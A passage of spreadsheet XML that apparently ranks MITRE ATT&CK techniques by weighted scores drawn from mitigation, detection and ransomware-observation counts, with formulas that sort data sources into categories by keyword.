        <v>149</v>
      </c>
      <c r="AK153" s="37" t="str" cm="1">
        <f t="array" ref="AK153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD153)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL153" s="37">
        <v>149</v>
      </c>
      <c r="AM153" s="37" t="str" cm="1">
        <f t="array" ref="AM153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD153)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN153" s="37">
        <v>0</v>
      </c>
      <c r="AO153" s="37">
        <v>4</v>
      </c>
      <c r="AP153" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ153" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>270.18689595238095</v>
      </c>
      <c r="AR153" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS153" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT153" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU15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25.827323424036276</v>
      </c>
    </row>
    <row r="154" spans="1:47" ht="34">
      <c r="A154" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B154" s="37">
        <f t="shared" si="2"/>
        <v>183.1618761428571</v>
      </c>
      <c r="C154" s="37" t="s">
        <v>555</v>
      </c>
      <c r="D154" s="50" t="s">
        <v>551</v>
      </c>
      <c r="E154" s="37" t="s">
        <v>556</v>
      </c>
      <c r="F154" s="37">
        <v>1</v>
      </c>
      <c r="G154" s="37">
        <v>1</v>
      </c>
      <c r="H154" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I154" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J154" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K154" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L154" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M154" s="37">
        <v>0</v>
      </c>
      <c r="N154" s="56">
        <v>0</v>
      </c>
      <c r="O154" s="56">
        <v>1</v>
      </c>
      <c r="P154" s="56">
        <v>2</v>
      </c>
      <c r="Q154" s="56">
        <v>8</v>
      </c>
      <c r="R154" s="57" t="s">
        <v>557</v>
      </c>
      <c r="S154" s="57">
        <v>2</v>
      </c>
      <c r="T154" s="57" t="s">
        <v>558</v>
      </c>
      <c r="U154" s="57">
        <v>14</v>
      </c>
      <c r="V154" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20476185714285711</v>
      </c>
      <c r="W154" s="37">
        <v>16</v>
      </c>
      <c r="X154" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y154" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z154" s="37">
        <v>11</v>
      </c>
      <c r="AA154" s="37">
        <v>0.11</v>
      </c>
      <c r="AB154" s="37">
        <v>0.11</v>
      </c>
      <c r="AC154" s="37"/>
      <c r="AD154" s="50" t="s">
        <v>559</v>
      </c>
      <c r="AE154" s="37" t="str" cm="1">
        <f t="array" ref="AE154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF154" s="37">
        <v>150</v>
      </c>
      <c r="AG154" s="37" t="str" cm="1">
        <f t="array" ref="AG154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH154" s="37">
        <v>150</v>
      </c>
      <c r="AI154" s="37" t="str" cm="1">
        <f t="array" ref="AI154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD154)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ154" s="37">
        <v>150</v>
      </c>
      <c r="AK154" s="37" t="str" cm="1">
        <f t="array" ref="AK154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL154" s="37">
        <v>150</v>
      </c>
      <c r="AM154" s="37" t="str" cm="1">
        <f t="array" ref="AM154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN154" s="37">
        <v>0</v>
      </c>
      <c r="AO154" s="37">
        <v>1</v>
      </c>
      <c r="AP154" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ154" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>61.053958714285699</v>
      </c>
      <c r="AR154" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS154" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT154" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU15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1.4774752074829927</v>
      </c>
    </row>
    <row r="155" spans="1:47" ht="51">
      <c r="A155" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B155" s="37">
        <f t="shared" si="2"/>
        <v>233.35720047619049</v>
      </c>
      <c r="C155" s="37" t="s">
        <v>560</v>
      </c>
      <c r="D155" s="50" t="s">
        <v>551</v>
      </c>
      <c r="E155" s="37" t="s">
        <v>561</v>
      </c>
      <c r="F155" s="37">
        <v>1</v>
      </c>
      <c r="G155" s="37">
        <v>1</v>
      </c>
      <c r="H155" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I155" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J155" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K155" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L155" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M155" s="37">
        <v>0</v>
      </c>
      <c r="N155" s="56">
        <v>5</v>
      </c>
      <c r="O155" s="56">
        <v>1</v>
      </c>
      <c r="P155" s="56">
        <v>2</v>
      </c>
      <c r="Q155" s="56">
        <v>6</v>
      </c>
      <c r="R155" s="57" t="s">
        <v>562</v>
      </c>
      <c r="S155" s="57">
        <v>11</v>
      </c>
      <c r="T155" s="57" t="s">
        <v>563</v>
      </c>
      <c r="U155" s="57">
        <v>12</v>
      </c>
      <c r="V155" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.28571438095238094</v>
      </c>
      <c r="W155" s="37">
        <v>23</v>
      </c>
      <c r="X155" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y155" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z155" s="37">
        <v>14</v>
      </c>
      <c r="AA155" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AB155" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AC155" s="37"/>
      <c r="AD155" s="50" t="s">
        <v>554</v>
      </c>
      <c r="AE155" s="37" t="str" cm="1">
        <f t="array" ref="AE155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD155)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF155" s="37">
        <v>151</v>
      </c>
      <c r="AG155" s="37" t="str" cm="1">
        <f t="array" ref="AG155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD155)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH155" s="37">
        <v>151</v>
      </c>
      <c r="AI155" s="37" t="str" cm="1">
        <f t="array" ref="AI155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD155)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ155" s="37">
        <v>151</v>
      </c>
      <c r="AK155" s="37" t="str" cm="1">
        <f t="array" ref="AK155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD155)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL155" s="37">
        <v>151</v>
      </c>
      <c r="AM155" s="37" t="str" cm="1">
        <f t="array" ref="AM155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD155)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN155" s="37">
        <v>0</v>
      </c>
      <c r="AO155" s="37">
        <v>4</v>
      </c>
      <c r="AP155" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ155" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>77.7857334920635</v>
      </c>
      <c r="AR155" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS155" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT155" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU15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7.5034031897203315</v>
      </c>
    </row>
    <row r="156" spans="1:47" ht="51">
      <c r="A156" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B156" s="37">
        <f t="shared" si="2"/>
        <v>266.80008700000002</v>
      </c>
      <c r="C156" s="37" t="s">
        <v>564</v>
      </c>
      <c r="D156" s="50" t="s">
        <v>551</v>
      </c>
      <c r="E156" s="37" t="s">
        <v>565</v>
      </c>
      <c r="F156" s="37">
        <v>1</v>
      </c>
      <c r="G156" s="37">
        <v>1</v>
      </c>
      <c r="H156" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I156" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J156" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K156" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L156" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M156" s="37">
        <v>0</v>
      </c>
      <c r="N156" s="56">
        <v>5</v>
      </c>
      <c r="O156" s="56">
        <v>1</v>
      </c>
      <c r="P156" s="56">
        <v>5</v>
      </c>
      <c r="Q156" s="56">
        <v>2</v>
      </c>
      <c r="R156" s="57" t="s">
        <v>566</v>
      </c>
      <c r="S156" s="57">
        <v>10</v>
      </c>
      <c r="T156" s="57" t="s">
        <v>567</v>
      </c>
      <c r="U156" s="57">
        <v>19</v>
      </c>
      <c r="V156" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.33809538095238095</v>
      </c>
      <c r="W156" s="37">
        <v>29</v>
      </c>
      <c r="X156" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Y156" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Z156" s="37">
        <v>13</v>
      </c>
      <c r="AA156" s="37">
        <v>0.13</v>
      </c>
      <c r="AB156" s="37">
        <v>0.13</v>
      </c>
      <c r="AC156" s="37"/>
      <c r="AD156" s="50" t="s">
        <v>554</v>
      </c>
      <c r="AE156" s="37" t="str" cm="1">
        <f t="array" ref="AE156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD156)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF156" s="37">
        <v>152</v>
      </c>
      <c r="AG156" s="37" t="str" cm="1">
        <f t="array" ref="AG156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD156)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH156" s="37">
        <v>152</v>
      </c>
      <c r="AI156" s="37" t="str" cm="1">
        <f t="array" ref="AI156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD156)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ156" s="37">
        <v>152</v>
      </c>
      <c r="AK156" s="37" t="str" cm="1">
        <f t="array" ref="AK156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD156)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL156" s="37">
        <v>152</v>
      </c>
      <c r="AM156" s="37" t="str" cm="1">
        <f t="array" ref="AM156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD156)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN156" s="37">
        <v>0</v>
      </c>
      <c r="AO156" s="37">
        <v>1</v>
      </c>
      <c r="AP156" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ156" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>88.933362333333335</v>
      </c>
      <c r="AR156" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS156" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT156" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU15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2.1412705317460317</v>
      </c>
    </row>
    <row r="157" spans="1:47" ht="51">
      <c r="A157" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B157" s="37">
        <f t="shared" si="2"/>
        <v>353.20482028571428</v>
      </c>
      <c r="C157" s="37" t="s">
        <v>568</v>
      </c>
      <c r="D157" s="50" t="s">
        <v>551</v>
      </c>
      <c r="E157" s="37" t="s">
        <v>569</v>
      </c>
      <c r="F157" s="37">
        <v>1</v>
      </c>
      <c r="G157" s="37">
        <v>1</v>
      </c>
      <c r="H157" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I157" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J157" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K157" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L157" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M157" s="37">
        <v>0</v>
      </c>
      <c r="N157" s="56">
        <v>0</v>
      </c>
      <c r="O157" s="56">
        <v>3</v>
      </c>
      <c r="P157" s="56">
        <v>1</v>
      </c>
      <c r="Q157" s="56">
        <v>28</v>
      </c>
      <c r="R157" s="57" t="s">
        <v>570</v>
      </c>
      <c r="S157" s="57">
        <v>12</v>
      </c>
      <c r="T157" s="57" t="s">
        <v>571</v>
      </c>
      <c r="U157" s="57">
        <v>22</v>
      </c>
      <c r="V157" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.47619057142857146</v>
      </c>
      <c r="W157" s="37">
        <v>34</v>
      </c>
      <c r="X157" s="37">
        <v>0.61818200000000001</v>
      </c>
      <c r="Y157" s="37">
        <v>0.61818200000000001</v>
      </c>
      <c r="Z157" s="37">
        <v>32</v>
      </c>
      <c r="AA157" s="37">
        <v>0.32</v>
      </c>
      <c r="AB157" s="37">
        <v>0.32</v>
      </c>
      <c r="AC157" s="37"/>
      <c r="AD157" s="50" t="s">
        <v>554</v>
      </c>
      <c r="AE157" s="37" t="str" cm="1">
        <f t="array" ref="AE157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD157)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF157" s="37">
        <v>153</v>
      </c>
      <c r="AG157" s="37" t="str" cm="1">
        <f t="array" ref="AG157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD157)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH157" s="37">
        <v>153</v>
      </c>
      <c r="AI157" s="37" t="str" cm="1">
        <f t="array" ref="AI157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD157)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ157" s="37">
        <v>153</v>
      </c>
      <c r="AK157" s="37" t="str" cm="1">
        <f t="array" ref="AK157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD157)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL157" s="37">
        <v>153</v>
      </c>
      <c r="AM157" s="37" t="str" cm="1">
        <f t="array" ref="AM157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD157)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN157" s="37">
        <v>0</v>
      </c>
      <c r="AO157" s="37">
        <v>1</v>
      </c>
      <c r="AP157" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ157" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>117.73494009523809</v>
      </c>
      <c r="AR157" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS157" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT157" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU15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2.8270223832199544</v>
      </c>
    </row>
    <row r="158" spans="1:47" ht="51">
      <c r="A158" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B158" s="37">
        <f t="shared" si="2"/>
        <v>291.04545195238103</v>
      </c>
      <c r="C158" s="37" t="s">
        <v>572</v>
      </c>
      <c r="D158" s="50" t="s">
        <v>573</v>
      </c>
      <c r="E158" s="37"/>
      <c r="F158" s="37">
        <v>4</v>
      </c>
      <c r="G158" s="37">
        <v>2</v>
      </c>
      <c r="H158" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.30000000000000004</v>
      </c>
      <c r="I158" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J158" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K158" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L158" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M158" s="37">
        <v>2.8200000000000002E-4</v>
      </c>
      <c r="N158" s="56">
        <v>0</v>
      </c>
      <c r="O158" s="56">
        <v>0</v>
      </c>
      <c r="P158" s="56">
        <v>2</v>
      </c>
      <c r="Q158" s="56">
        <v>0</v>
      </c>
      <c r="R158" s="57" t="s">
        <v>574</v>
      </c>
      <c r="S158" s="57">
        <v>7</v>
      </c>
      <c r="T158" s="57" t="s">
        <v>575</v>
      </c>
      <c r="U158" s="57">
        <v>10</v>
      </c>
      <c r="V158" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17142861904761905</v>
      </c>
      <c r="W158" s="37">
        <v>17</v>
      </c>
      <c r="X158" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y158" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z158" s="37">
        <v>2</v>
      </c>
      <c r="AA158" s="37">
        <v>0.02</v>
      </c>
      <c r="AB158" s="37">
        <v>0.02</v>
      </c>
      <c r="AC158" s="37"/>
      <c r="AD158" s="50" t="s">
        <v>576</v>
      </c>
      <c r="AE158" s="37" t="str" cm="1">
        <f t="array" ref="AE158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD158)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF158" s="37">
        <v>154</v>
      </c>
      <c r="AG158" s="37" t="str" cm="1">
        <f t="array" ref="AG158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD158)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH158" s="37">
        <v>154</v>
      </c>
      <c r="AI158" s="37" t="str" cm="1">
        <f t="array" ref="AI158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD158)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ158" s="37">
        <v>154</v>
      </c>
      <c r="AK158" s="37" t="str" cm="1">
        <f t="array" ref="AK158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD158)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL158" s="37">
        <v>154</v>
      </c>
      <c r="AM158" s="37" t="str" cm="1">
        <f t="array" ref="AM158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD158)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN158" s="37">
        <v>0</v>
      </c>
      <c r="AO158" s="37">
        <v>3</v>
      </c>
      <c r="AP158" s="37">
